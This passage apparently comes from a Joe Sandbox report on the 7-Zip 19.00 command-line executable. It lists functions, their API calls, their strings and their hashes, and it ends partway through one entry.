Opcode ID: ab664bf3e0e52273a7b2c93043638589f708cf9af184803b1dcc7a9fe34b6b52
Instruction ID: bef95ea0e8edf6a24411242939216657c27bfe56dbcb3ede60f6f15a2f4e51d2
Opcode Fuzzy Hash: ab664bf3e0e52273a7b2c93043638589f708cf9af184803b1dcc7a9fe34b6b52
Instruction Fuzzy Hash: 2AD1E433215A8086CB20EF25E4913AEB7A0F785B96F4441E5EF9A57B59DF38C949CB00

Function 00B5A224 Relevance: 37.8, APIs: 22, Strings: 3, Instructions: 317COMMON

Download Yara Rule

Strings

\, xrefs: 00B5A363
\\?\, xrefs: 00B5A3ED, 00B5A4CF
\\?\UNC\, xrefs: 00B5A527, 00B5A66C

Memory Dump Source

Source File: 0000000C.00000002.269510044440.0000000000B51000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00B50000, based on PE: true

Associated: 0000000C.00000002.269509973256.0000000000B50000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510166782.0000000000B9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510273642.0000000000BBC000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510345601.0000000000BBF000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_b50000_7z.jbxd

Similarity

API ID:
String ID: \$\\?\$\\?\UNC\
API String ID: 0-1962706685
Opcode ID: afa8621be2f1ba154e1a16fbf024995038344baa93033ba3e81e106e98a5c824
Instruction ID: 9e6a71122c45e32a1240d07d8ecadf072df0732f760c3aac57f405c01d0de0a7
Opcode Fuzzy Hash: afa8621be2f1ba154e1a16fbf024995038344baa93033ba3e81e106e98a5c824
Instruction Fuzzy Hash: FEB1942230994090CE10FF21E4A176EA7E0EB92BD6F4452D1FE4A67775DF69C94ECB02

Function 00B51C58 Relevance: 31.5, APIs: 25, Instructions: 294COMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00B51C98
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,?,?,?,?), ref: 00B51CB9

Memory Dump Source

Source File: 0000000C.00000002.269510044440.0000000000B51000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00B50000, based on PE: true

Associated: 0000000C.00000002.269509973256.0000000000B50000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510166782.0000000000B9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510273642.0000000000BBC000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510345601.0000000000BBF000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_b50000_7z.jbxd

Similarity

API ID: ErrorLast
String ID:
API String ID: 1452528299-0
Opcode ID: 9404618c4272822a705cb722a6b2e01a42813b165ea22c09ed02a541621bc0be
Instruction ID: 19e8e3d48f5a26abccc6b7a62f5ba3d21d470db7dab5278ac96db47e9f2bf2c5
Opcode Fuzzy Hash: 9404618c4272822a705cb722a6b2e01a42813b165ea22c09ed02a541621bc0be
Instruction Fuzzy Hash: 8EA1932264A64081CB20EF19E49176EB7A1E7D67D2F4415D2FF8E53769DF28C88ECB00

Function 00B97F50 Relevance: 30.2, APIs: 24, Instructions: 154COMMON

Download Yara Rule

APIs

free.MSVCRT ref: 00B97FA0
free.MSVCRT ref: 00B97FA8
free.MSVCRT ref: 00B97FB8
free.MSVCRT ref: 00B97FC4
free.MSVCRT ref: 00B97FF6
free.MSVCRT ref: 00B97FFE
free.MSVCRT ref: 00B9800E
free.MSVCRT ref: 00B98026
free.MSVCRT ref: 00B98058
free.MSVCRT ref: 00B98061
free.MSVCRT ref: 00B98069
free.MSVCRT ref: 00B98079
free.MSVCRT ref: 00B98085
free.MSVCRT ref: 00B980B7
free.MSVCRT ref: 00B980BF
free.MSVCRT ref: 00B980CF
free.MSVCRT ref: 00B98108
free.MSVCRT ref: 00B98110
free.MSVCRT ref: 00B9811D
free.MSVCRT ref: 00B98127
free.MSVCRT ref: 00B98131
free.MSVCRT ref: 00B9815D
free.MSVCRT ref: 00B98165
free.MSVCRT ref: 00B98172

Memory Dump Source

Source File: 0000000C.00000002.269510044440.0000000000B51000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00B50000, based on PE: true

Associated: 0000000C.00000002.269509973256.0000000000B50000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510166782.0000000000B9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510273642.0000000000BBC000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510345601.0000000000BBF000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_b50000_7z.jbxd

Similarity

API ID: free
String ID:
API String ID: 1294909896-0
Opcode ID: a5da411e75573f0648736714f517a5bbb6ba3fc978bf78ef7329a5e2f6ab8de4
Instruction ID: 667dcfeb1e6095173dd2ce3354af47ca269468299d0e2af8a280b77e941f1df7
Opcode Fuzzy Hash: a5da411e75573f0648736714f517a5bbb6ba3fc978bf78ef7329a5e2f6ab8de4
Instruction Fuzzy Hash: F6514F27712E8089CB21EF31D85136A63A1F797F99F5941F2DE2D2B759DF20C8068750

Function 00B96C04 Relevance: 28.2, APIs: 9, Strings: 7, Instructions: 160COMMON

Download Yara Rule

APIs

fputs.MSVCRT ref: 00B96C87

Part of subcall function 00B52670: fputs.MSVCRT ref: 00B5268F

fputs.MSVCRT ref: 00B96C4F

Part of subcall function 00B96B3C: fputs.MSVCRT ref: 00B96B7C
Part of subcall function 00B96B3C: free.MSVCRT ref: 00B96BAE
Part of subcall function 00B96B3C: fputs.MSVCRT ref: 00B96BCC

fputs.MSVCRT ref: 00B96D13
fputs.MSVCRT ref: 00B96D3D
fputs.MSVCRT ref: 00B96D6D
fputs.MSVCRT ref: 00B96D87
fputc.MSVCRT ref: 00B96D9A
free.MSVCRT ref: 00B96E3A
free.MSVCRT ref: 00B96E72

Part of subcall function 00B52300: fputc.MSVCRT ref: 00B52311

Strings

Scan WARNINGS for files and folders:, xrefs: 00B96C48
Scan WARNINGS: , xrefs: 00B96C80
WARNINGS for files:, xrefs: 00B96D36
Error:, xrefs: 00B96E50
file, xrefs: 00B96D80
Everything is Ok, xrefs: 00B96D0C
WARNING: Cannot open , xrefs: 00B96D66

Memory Dump Source

Source File: 0000000C.00000002.269510044440.0000000000B51000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00B50000, based on PE: true

Associated: 0000000C.00000002.269509973256.0000000000B50000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510166782.0000000000B9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510273642.0000000000BBC000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510345601.0000000000BBF000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_b50000_7z.jbxd

Similarity

API ID: fputs$free$fputc
String ID: Error:$ file$Everything is Ok$Scan WARNINGS for files and folders:$Scan WARNINGS: $WARNING: Cannot open $WARNINGS for files:
API String ID: 2662072562-1527772849
Opcode ID: da4e118f9d486780fcc46832e40a27d855b0a713e45ff0d8968e49b5411b90f1
Instruction ID: da56958079d4c5fe8c2276ad7a2270fa36e2566ff2c5f62c15ac92a54926d42c
Opcode Fuzzy Hash: da4e118f9d486780fcc46832e40a27d855b0a713e45ff0d8968e49b5411b90f1
Instruction Fuzzy Hash: 5651BE7230590086CE25EB21E69037E73A1FB86BD5F4441F5EE6E43769DF28C949C300

Function 00B71988 Relevance: 27.7, APIs: 22, Instructions: 211COMMON

Download Yara Rule

APIs

Part of subcall function 00B53314: memmove.MSVCRT ref: 00B53339

free.MSVCRT ref: 00B71A13
free.MSVCRT ref: 00B71A73
free.MSVCRT ref: 00B71AA1
free.MSVCRT ref: 00B71AA9
free.MSVCRT ref: 00B71AB7
free.MSVCRT ref: 00B71AC2
free.MSVCRT ref: 00B71C8F
free.MSVCRT ref: 00B71C9A
free.MSVCRT ref: 00B71CA7
free.MSVCRT ref: 00B71CB4

Memory Dump Source

Source File: 0000000C.00000002.269510044440.0000000000B51000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00B50000, based on PE: true

Associated: 0000000C.00000002.269509973256.0000000000B50000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510166782.0000000000B9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510273642.0000000000BBC000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510345601.0000000000BBF000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_b50000_7z.jbxd

Similarity

API ID: free$memmove
String ID:
API String ID: 1534225298-0
Opcode ID: 487434742999afad6c6a49a55d089b6f01de136bf747d36331bc54ee911b7c32
Instruction ID: cdfd18283d658db8f73f23773e5d346842e7321fb58e736e3c8759e61b7e4a95
Opcode Fuzzy Hash: 487434742999afad6c6a49a55d089b6f01de136bf747d36331bc54ee911b7c32
Instruction Fuzzy Hash: 4771862231AA8091CA20EB29E49139FA7A0F7C27D1F5451D2FFAD57769DF28C44ACB10

Function 00B8187D Relevance: 25.2, APIs: 20, Instructions: 214COMMON

Download Yara Rule

APIs

free.MSVCRT ref: 00B8187D

Part of subcall function 00B52130: malloc.MSVCRT ref: 00B52134
Part of subcall function 00B52130: _CxxThrowException.MSVCRT ref: 00B5214F

Memory Dump Source

Source File: 0000000C.00000002.269510044440.0000000000B51000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00B50000, based on PE: true

Associated: 0000000C.00000002.269509973256.0000000000B50000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510166782.0000000000B9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510273642.0000000000BBC000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510345601.0000000000BBF000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_b50000_7z.jbxd

Similarity

API ID: ExceptionThrowfreemalloc
String ID:
API String ID: 2861928636-0
Opcode ID: 715b52d3456352f88bffa419932dca49956056468a6bc82701705f4594a5e09d
Instruction ID: f526ec6573b2ea8bd2a61a3b91e3586cfcc5114c232ea3396c3dd8cf78deda48
Opcode Fuzzy Hash: 715b52d3456352f88bffa419932dca49956056468a6bc82701705f4594a5e09d
Instruction Fuzzy Hash: 4F812A7730AAC481CA60EB26E450BAF67A4F7D6B85F0154A2DF8E53B15CF38C44ACB04

Function 00B972C8 Relevance: 25.1, APIs: 20, Instructions: 81COMMON

Download Yara Rule

APIs

free.MSVCRT ref: 00B972DB
free.MSVCRT ref: 00B9730D
free.MSVCRT ref: 00B97315
free.MSVCRT ref: 00B9731D
free.MSVCRT ref: 00B9732D
free.MSVCRT ref: 00B97339
free.MSVCRT ref: 00B97345
free.MSVCRT ref: 00B97351
free.MSVCRT ref: 00B9735D
free.MSVCRT ref: 00B97369
free.MSVCRT ref: 00B97375
free.MSVCRT ref: 00B97381
free.MSVCRT ref: 00B9738D
free.MSVCRT ref: 00B97399
free.MSVCRT ref: 00B973A2
free.MSVCRT ref: 00B973AB
free.MSVCRT ref: 00B973B4
free.MSVCRT ref: 00B973E9
free.MSVCRT ref: 00B973F1
free.MSVCRT ref: 00B973F9

Memory Dump Source

Source File: 0000000C.00000002.269510044440.0000000000B51000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00B50000, based on PE: true

Associated: 0000000C.00000002.269509973256.0000000000B50000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510166782.0000000000B9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510273642.0000000000BBC000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510345601.0000000000BBF000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_b50000_7z.jbxd

Similarity

API ID: free
String ID:
API String ID: 1294909896-0
Opcode ID: 604b93e9740048c82800e9d74cf7720333369c55d8207d772f7bb48edf82253e
Instruction ID: 6a43bdf6446b5cf705d74e7899ffb4d851a1b11918750c6e3195f5db806573b4
Opcode Fuzzy Hash: 604b93e9740048c82800e9d74cf7720333369c55d8207d772f7bb48edf82253e
Instruction Fuzzy Hash: 6A31C823717D4085CA11BF26DC513AE63A0EB86F96F1901F29F2D6B369CE20C8468754

Function 00B8DCB0 Relevance: 22.8, APIs: 10, Strings: 5, Instructions: 323COMMON

Download Yara Rule

APIs

free.MSVCRT ref: 00B8DE77
free.MSVCRT ref: 00B8DE82
free.MSVCRT ref: 00B8DE8C

Part of subcall function 00B5AEBC: memmove.MSVCRT ref: 00B5AEE7

free.MSVCRT ref: 00B8DF0B

Strings

3, xrefs: 00B8E0BC
?, xrefs: 00B8DF66
Z, xrefs: 00B8DEBC
2, xrefs: 00B8DFF8
?, xrefs: 00B8E024

Memory Dump Source

Source File: 0000000C.00000002.269510044440.0000000000B51000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00B50000, based on PE: true

Associated: 0000000C.00000002.269509973256.0000000000B50000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510166782.0000000000B9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510273642.0000000000BBC000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510345601.0000000000BBF000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_b50000_7z.jbxd

Similarity

API ID: free$memmove
String ID: 2$3$?$?$Z
API String ID: 1534225298-3338962022
Opcode ID: 84abab613373cf7922060763a3c287b9f684fa76ebb682cbcf5688f653a5ccb0
Instruction ID: 0cf3b5dd3999ec021b237805d38130c4f59617f5cd4e09a31a2d026bcb9c2e7b
Opcode Fuzzy Hash: 84abab613373cf7922060763a3c287b9f684fa76ebb682cbcf5688f653a5ccb0
Instruction Fuzzy Hash: 24C1D633214A8492CA30FB25D48566FB7A1F7D5B84F504293EBAEA3779DE38C949C700

Function 00B63AFC Relevance: 21.4, APIs: 17, Instructions: 169COMMON

Download Yara Rule

APIs

free.MSVCRT ref: 00B63B4A
free.MSVCRT ref: 00B63B52
free.MSVCRT ref: 00B63B62
free.MSVCRT ref: 00B63B6E
free.MSVCRT ref: 00B63BA0
free.MSVCRT ref: 00B63BA8
free.MSVCRT ref: 00B63BB8
free.MSVCRT ref: 00B63BC4
free.MSVCRT ref: 00B63BF6
free.MSVCRT ref: 00B63BFE
free.MSVCRT ref: 00B63C0E
free.MSVCRT ref: 00B63C53
free.MSVCRT ref: 00B63C5B
free.MSVCRT ref: 00B63C6B
free.MSVCRT ref: 00B63C9E
free.MSVCRT ref: 00B63CDE
free.MSVCRT ref: 00B63CE8

Memory Dump Source

Source File: 0000000C.00000002.269510044440.0000000000B51000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00B50000, based on PE: true

Associated: 0000000C.00000002.269509973256.0000000000B50000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510166782.0000000000B9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510273642.0000000000BBC000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510345601.0000000000BBF000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_b50000_7z.jbxd

Similarity

API ID: free
String ID:
API String ID: 1294909896-0
Opcode ID: ca853514d698da322178c764a93f6451d2681f45a97f5268fbff0ab336d04f61
Instruction ID: 8b1635a6657d23d52844254abf854f7a78574c066c59e9b164d453672a87627c
Opcode Fuzzy Hash: ca853514d698da322178c764a93f6451d2681f45a97f5268fbff0ab336d04f61
Instruction Fuzzy Hash: 9D51F927703E8489CB25EF36D4A466D67A0FB86F95B1D41B6DF1E2B718CF28C9098350

Function 00B8D998 Relevance: 21.2, APIs: 13, Strings: 1, Instructions: 197COMMON

Download Yara Rule

APIs

Part of subcall function 00B54D78: free.MSVCRT ref: 00B54DBC
Part of subcall function 00B54D78: free.MSVCRT ref: 00B54DC4
Part of subcall function 00B54D78: free.MSVCRT ref: 00B54EAC

free.MSVCRT ref: 00B8DAAC
free.MSVCRT ref: 00B8DAB4
free.MSVCRT ref: 00B8DAC2
free.MSVCRT ref: 00B8DAF0
free.MSVCRT ref: 00B8DAF8
free.MSVCRT ref: 00B8DB06
free.MSVCRT ref: 00B8DBB6
free.MSVCRT ref: 00B8DBE9
free.MSVCRT ref: 00B8DBF1
free.MSVCRT ref: 00B8DBFF
free.MSVCRT ref: 00B8DC2D
free.MSVCRT ref: 00B8DC35
free.MSVCRT ref: 00B8DC43

Part of subcall function 00B54338: wcscmp.MSVCRT ref: 00B54345

Strings

..\, xrefs: 00B8DB27

Memory Dump Source

Source File: 0000000C.00000002.269510044440.0000000000B51000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00B50000, based on PE: true

Associated: 0000000C.00000002.269509973256.0000000000B50000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510166782.0000000000B9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510273642.0000000000BBC000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510345601.0000000000BBF000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_b50000_7z.jbxd

Similarity

API ID: free$wcscmp
String ID: ..\
API String ID: 4021281200-2756224523
Opcode ID: 7888456042c53789908d25aad9b3813a7becaf42d114683dbdf658571ea549be
Instruction ID: b28cb33b2d2b03e83be3a67ef6261afd231523b671d155d1e05874e2001d49d3
Opcode Fuzzy Hash: 7888456042c53789908d25aad9b3813a7becaf42d114683dbdf658571ea549be
Instruction Fuzzy Hash: 16619323715A8086CB20EF16E49031E77A1FBD6B95F5941A2EF5E177A8DF78C846CB00

Function 00B90B2C Relevance: 21.1, APIs: 9, Strings: 3, Instructions: 71COMMON

Download Yara Rule

APIs

fputs.MSVCRT ref: 00B90B57
fputs.MSVCRT ref: 00B90B67

Part of subcall function 00B52568: free.MSVCRT ref: 00B525B5
Part of subcall function 00B52568: free.MSVCRT ref: 00B525C0

Part of subcall function 00B52300: fputc.MSVCRT ref: 00B52311

fputs.MSVCRT ref: 00B90BB4
fputs.MSVCRT ref: 00B90BC4
fputs.MSVCRT ref: 00B90BD0
free.MSVCRT ref: 00B90BE4
fputs.MSVCRT ref: 00B90C0C
fputs.MSVCRT ref: 00B90C1C
fputs.MSVCRT ref: 00B90C2A

Strings

Size: , xrefs: 00B90BBD
Modified: , xrefs: 00B90C15
Path: , xrefs: 00B90B60

Memory Dump Source

Source File: 0000000C.00000002.269510044440.0000000000B51000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00B50000, based on PE: true

Associated: 0000000C.00000002.269509973256.0000000000B50000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510166782.0000000000B9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510273642.0000000000BBC000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510345601.0000000000BBF000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_b50000_7z.jbxd

Similarity

API ID: fputs$free$fputc
String ID: Modified: $Path: $Size:
API String ID: 2662072562-3207571042
Opcode ID: baf16f6fc6d4a04671d563c07444ec4426631ca8bc597a177c284f797b747402
Instruction ID: dc568a696c0f72593d412a6a7235258a0039a3cd50b865c2691f70ddec44c4ff
Opcode Fuzzy Hash: baf16f6fc6d4a04671d563c07444ec4426631ca8bc597a177c284f797b747402
Instruction Fuzzy Hash: 95214B62315A0295DE10EB25E95436E3321FB96BF9F4482A2EE6D436A5DF2CC95AC300

Function 00B5BF04 Relevance: 20.3, APIs: 16, Instructions: 327COMMON

Download Yara Rule

APIs

free.MSVCRT ref: 00B5BF55
free.MSVCRT ref: 00B5BF5D
free.MSVCRT ref: 00B5BF93
free.MSVCRT ref: 00B5BF9B
free.MSVCRT ref: 00B5BFF4
free.MSVCRT ref: 00B5C1DC
free.MSVCRT ref: 00B5C1F6
free.MSVCRT ref: 00B5C210
free.MSVCRT ref: 00B5C22A
free.MSVCRT ref: 00B5C1A5

Part of subcall function 00B52D34: free.MSVCRT ref: 00B52D77

free.MSVCRT ref: 00B5C1C2
free.MSVCRT ref: 00B5C237
free.MSVCRT ref: 00B5C248
free.MSVCRT ref: 00B5C253
free.MSVCRT ref: 00B5C3AF
free.MSVCRT ref: 00B5C3BD

Memory Dump Source

Source File: 0000000C.00000002.269510044440.0000000000B51000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00B50000, based on PE: true

Associated: 0000000C.00000002.269509973256.0000000000B50000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510166782.0000000000B9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510273642.0000000000BBC000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510345601.0000000000BBF000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_b50000_7z.jbxd

Similarity

API ID: free
String ID:
API String ID: 1294909896-0
Opcode ID: b4b88fefa1dc8cc45d876b51e8a403cde685ba7d07cf5a0b4bc54341fa2cdd8b
Instruction ID: 23bf4e2b48383e6b476ff239a486a83a84317ca635eaabed30a836e829cfe8dd
Opcode Fuzzy Hash: b4b88fefa1dc8cc45d876b51e8a403cde685ba7d07cf5a0b4bc54341fa2cdd8b
Instruction Fuzzy Hash: 10C18123315A8486CA20EF25D49176EA7B1F7CAB42F6441E2EF4E63765CF39C949CB04

Function 00B60998 Relevance: 19.6, APIs: 12, Strings: 1, Instructions: 133COMMON

Download Yara Rule

APIs

memmove.MSVCRT ref: 00B609CE
memmove.MSVCRT ref: 00B609E7
memmove.MSVCRT ref: 00B60A00
_CxxThrowException.MSVCRT ref: 00B60B70
free.MSVCRT ref: 00B60B7E
free.MSVCRT ref: 00B60B8B
free.MSVCRT ref: 00B60B98
free.MSVCRT ref: 00B60BA5
free.MSVCRT ref: 00B60BB2
free.MSVCRT ref: 00B60BBC
free.MSVCRT ref: 00B60BC6
free.MSVCRT ref: 00B60BD0

Strings

Incorrect volume size:, xrefs: 00B60B53

Memory Dump Source

Source File: 0000000C.00000002.269510044440.0000000000B51000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00B50000, based on PE: true

Associated: 0000000C.00000002.269509973256.0000000000B50000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510166782.0000000000B9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510273642.0000000000BBC000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510345601.0000000000BBF000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_b50000_7z.jbxd

Similarity

API ID: free$memmove$ExceptionThrow
String ID: Incorrect volume size:
API String ID: 3957182552-1799541332
Opcode ID: 4436e24a10e8fc572d61ba3777d2b135a9ae8f78e93ce841be10de43e0223506
Instruction ID: 71d0e44191e85b704868860d84352e3ac7c53347d524031d3d89ff82bfabd31e
Opcode Fuzzy Hash: 4436e24a10e8fc572d61ba3777d2b135a9ae8f78e93ce841be10de43e0223506
Instruction Fuzzy Hash: 59517E73315A8492DF20EF26D8913AEB3A0F785B84F4481A2DF9D47765DF68C549CB40

Function 00B67178 Relevance: 19.0, APIs: 15, Instructions: 200COMMON

Download Yara Rule

APIs

free.MSVCRT ref: 00B671FD

Memory Dump Source

Source File: 0000000C.00000002.269510044440.0000000000B51000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00B50000, based on PE: true

Associated: 0000000C.00000002.269509973256.0000000000B50000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510166782.0000000000B9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510273642.0000000000BBC000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510345601.0000000000BBF000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_b50000_7z.jbxd

Similarity

API ID: free
String ID:
API String ID: 1294909896-0
Opcode ID: f4d9c5df7f8b7d7a50d10b176def1ac906b2dbe33b2ad29e85ea175187436e74
Instruction ID: 3fd5050cc18a931a901fae55f537066a81aca1d7aee4320795a449657a809f13
Opcode Fuzzy Hash: f4d9c5df7f8b7d7a50d10b176def1ac906b2dbe33b2ad29e85ea175187436e74
Instruction Fuzzy Hash: 21716F22349A4081DB10EF25E89436E77E1FB86BD9F4441E2AF5E97765DF28C48AC740

Function 00B5A8A0 Relevance: 18.2, APIs: 10, Strings: 2, Instructions: 162COMMON

Download Yara Rule

APIs

Part of subcall function 00B5339C: free.MSVCRT ref: 00B533D7
Part of subcall function 00B5339C: memmove.MSVCRT(00000000,?,?,00000000,00B510A8), ref: 00B533F2

free.MSVCRT ref: 00B5A90A
free.MSVCRT ref: 00B5A9AD

Strings

\, xrefs: 00B5AA1B
/, xrefs: 00B5AA22

Memory Dump Source

Source File: 0000000C.00000002.269510044440.0000000000B51000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00B50000, based on PE: true

Associated: 0000000C.00000002.269509973256.0000000000B50000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510166782.0000000000B9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510273642.0000000000BBC000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510345601.0000000000BBF000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_b50000_7z.jbxd

Similarity

API ID: free$memmove
String ID: /$\
API String ID: 1534225298-1600464054
Opcode ID: f198c9d99514ce9e4ce6b0316728f7062312fdaa462ade4dde103b6963418a90
Instruction ID: 7b8318af98d81589e85b5686d99b82a48dcab4c618f6193eac2652ff4b11a77a
Opcode Fuzzy Hash: f198c9d99514ce9e4ce6b0316728f7062312fdaa462ade4dde103b6963418a90
Instruction Fuzzy Hash: 8E51D412305A4090CE21FF21D59137E67E0EB86BD6B4052E1BF4E67765DF28CA4ECB02

Function 00B985C7 Relevance: 17.6, APIs: 8, Strings: 2, Instructions: 58COMMON

Download Yara Rule

APIs

free.MSVCRT ref: 00B985DA
free.MSVCRT ref: 00B985E2
memmove.MSVCRT ref: 00B98602
fputs.MSVCRT ref: 00B98637
fputs.MSVCRT ref: 00B98647
free.MSVCRT ref: 00B9867B
free.MSVCRT ref: 00B98683
free.MSVCRT ref: 00B98695

Strings

7-Zip 19.00 (x64) : Copyright (c) 1999-2018 Igor Pavlov : 2019-02-21, xrefs: 00B98630
Usage: 7z <command> [<switches>...] <archive_name> [<file_names>...] [@listfile]<Commands> a : Add files to archive b : Benchmark d : Delete files from archive e : Extract files from archive (without using directory names) h : Calculate hash values, xrefs: 00B98640

Memory Dump Source

Source File: 0000000C.00000002.269510044440.0000000000B51000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00B50000, based on PE: true

Associated: 0000000C.00000002.269509973256.0000000000B50000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510166782.0000000000B9F000.00000002.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510273642.0000000000BBC000.00000004.00000001.01000000.0000000C.sdmpDownload File
Associated: 0000000C.00000002.269510345601.0000000000BBF000.00000002.00000001.01000000.0000000C.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_12_2_b50000_7z.jbxd

Similarity

API ID: free$fputs$memmove
String ID: 7-Zip 19.00 (x64) : Copyright (c) 1999-2018 Igor Pavlov : 2019-02-21$Usage: 7z <command> [<switches>...] <archive_name> [<file_names>...] [@listfile]<Commands> a : Add files to archive b : Benchmark d : Delete files from archive e : Extract files from archive (without using directory names) h : Calculate hash values
API String ID: 2337578458-4238946813
Opcode ID: fc1f1692e1a7be690a265933f0a82059642291962d2ae098a8720eef4c07a75c
Instruction ID: 966a64ef061f8f6ad173eb8f1229c8bee8d8805f108dcd4b1ac65bcb2845b73d
Opcode Fuzzy Hash: fc1f1692e1a7be690a265933f0a82059642291962d2ae098a8720eef4c07a75c
Instruction Fuzzy Hash: 7B112B63306AC196DE20DF15E99036EB362F786B95F5440A2CF5D6B719CF38C89ACB01

Function 00B5FEC8 Relevance: 16.6, APIs: 8, Strings: 3, Instructions: 146COMMON

Download Yara Rule

APIs

Part of subcall function 00B58624: free.MSVCRT ref: 00B586A9

_CxxThrowException.MSVCRT ref: 00B5FF2F
free.MSVCRT ref: 00B5FFAE
